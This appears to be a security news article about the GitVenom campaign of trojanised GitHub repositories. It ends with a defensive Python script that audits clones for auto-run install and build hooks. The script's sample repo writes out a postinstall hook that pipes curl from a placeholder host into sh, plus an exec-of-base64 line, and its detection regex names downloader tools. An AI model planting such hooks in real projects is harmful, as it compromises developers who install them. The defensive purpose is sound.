In a recent discovery, security researchers have found more than 200 malicious repositories on GitHub that were part of a large-scale campaign targeting gamers and developers. These projects appeared to be normal open-source tools like game cheats, Telegram bots, or social media utilities. But behind the scenes, they were designed to deliver malware to anyone who downloaded or ran them.

This campaign has been dubbed “GitHub Trojan Campaign” or “GitVenom” by cybersecurity experts. The attackers used GitHub’s trust and popularity to spread their malware, hiding it inside code libraries that looked genuine and useful. Some of these repositories had thousands of automated commits and AI-generated README files to make them look even more authentic.
What made this campaign dangerous was how convincingly the fake repositories were built. The README files were written in multiple languages, and the project descriptions were clean and professional. All of this effort went into persuading developers and security researchers that the code was safe to use.

Once someone downloaded the repository and built or ran the code, the malicious scripts were triggered. These scripts downloaded malware in the background, giving attackers full access to the victim’s system or allowing them to steal sensitive data. In many cases, these malware files were information stealers that captured login credentials, browser data, and even cryptocurrency wallet addresses.
One of the common malware types used in this campaign was a Node.js stealer. It would collect saved passwords, browser cookies, session tokens, and files, then compress them into a zip file and send them to the attacker through Telegram. Another variant used AsyncRAT, a tool that gives hackers remote control over the infected device. Other tools included clipboard clippers, which watch for copied crypto wallet addresses and silently replace them with the attacker’s own address to redirect funds during transactions.

One attack even resulted in stolen cryptocurrency worth nearly 5 Bitcoin (around $485,000). That’s a major loss, especially for developers who trusted open-source projects.
The campaign has been running for almost two years and is believed to have affected developers and users from countries like Russia, Brazil, and Turkey. The repositories targeted various programming languages such as Python, JavaScript, C, C++, and C#, which means the attackers aimed for a wide range of developers.
The goal of this attack was not just to infect one or two users. It was a supply-chain-style attack, where the infected code gets passed on as part of larger projects, tools, or libraries, affecting even more people over time.
One major reason this campaign was so successful is that developers often trust code found on GitHub. Many people skip reviewing the build scripts or dependencies, assuming that popular or active repositories are safe. But in this case, those same build scripts were hiding malware that could silently steal data or give hackers control of the device.
To stay safe, users should follow a few important steps. First, always review any build scripts or pre-build events before running code, especially from unknown repositories. Second, avoid downloading files or repositories shared in random Telegram groups, Discord servers, or forums. Third, keep your anti-malware and endpoint security tools updated, and don’t ignore suspicious behavior on your device. Lastly, if you ever come across a suspicious GitHub project, report it to GitHub immediately.
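As an added example (not code from the original article or from any GitVenom sample), the following Python audit walks a freshly cloned repository and flags the places where code runs automatically on install or build: npm lifecycle hooks, MSBuild pre/post-build events, and Python files that exec a long base64 blob. That is exactly what the first step above asks a developer to review before building. Every file, path and command in the sample checkout is constructed for the demo, and the regexes are a starting heuristic, not a complete detector.

```python
import base64, json, re, tempfile
from pathlib import Path

# Downloaders and inline interpreters inside an install/build hook are how a hook fetches a second stage.
HOOK_CMD = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|powershell|node\s+-e|python\s+-c)\b", re.I)
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")
MSBUILD_EVENTS = re.compile(r"<(PreBuildEvent|PostBuildEvent)>(.*?)</\1>", re.S | re.I)
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
PY_DYN_EXEC = re.compile(r"\b(exec|eval)\s*\(")

def audit_repo(root):
    """Return human-readable findings for code that runs automatically when the repo is installed or built."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(errors="replace")
        if path.name == "package.json":
            try:
                scripts = json.loads(text).get("scripts", {})
            except json.JSONDecodeError:
                continue
            for hook in NPM_HOOKS:  # only hooks that npm runs without being asked
                cmd = scripts.get(hook, "")
                if HOOK_CMD.search(cmd):
                    findings.append(f"{rel}: npm '{hook}' hook runs: {cmd}")
        elif path.suffix.lower() == ".csproj":
            for event, body in MSBUILD_EVENTS.findall(text):  # runs on every build in Visual Studio/msbuild
                if HOOK_CMD.search(body):
                    findings.append(f"{rel}: MSBuild {event} runs: {body.strip()}")
        elif path.suffix.lower() == ".py" and PY_DYN_EXEC.search(text) and LONG_B64.search(text):
            findings.append(f"{rel}: exec/eval applied next to a long base64 blob")
    return findings

def build_sample_repo():
    """Write a constructed sample checkout (placeholder content, not a real GitVenom repository)."""
    root = Path(tempfile.mkdtemp())
    (root / "package.json").write_text(json.dumps({"name": "demo-bot", "scripts": {
        "postinstall": "curl -s https://example.invalid/setup.sh | sh"}}))
    (root / "Cheat.csproj").write_text("<Project><PropertyGroup><PreBuildEvent>powershell -File tools/prebuild.ps1"
                                       "</PreBuildEvent></PropertyGroup></Project>")
    blob = base64.b64encode(b"print('constructed placeholder payload')" * 8).decode()
    (root / "setup.py").write_text(f"import base64\nexec(base64.b64decode('{blob}'))\n")
    (root / "src").mkdir()
    (root / "src" / "main.py").write_text("print('clean module')\n")  # ordinary code, must not be flagged
    return root
```

Run `audit_repo` against a clone before the first `npm install` or build; an empty result does not prove the repo is clean, but any finding is a script that deserves reading line by line.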
This campaign is a strong reminder that even trusted platforms like GitHub can be used for cyberattacks. It’s important to double-check what you’re downloading and running, especially if it includes scripts, executables, or dependencies you don’t recognize.
The GitVenom campaign proves that open-source projects can be weaponized, and being cautious isn’t optional anymore; it’s necessary.
Stay alert, and keep your security measures updated!
Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news
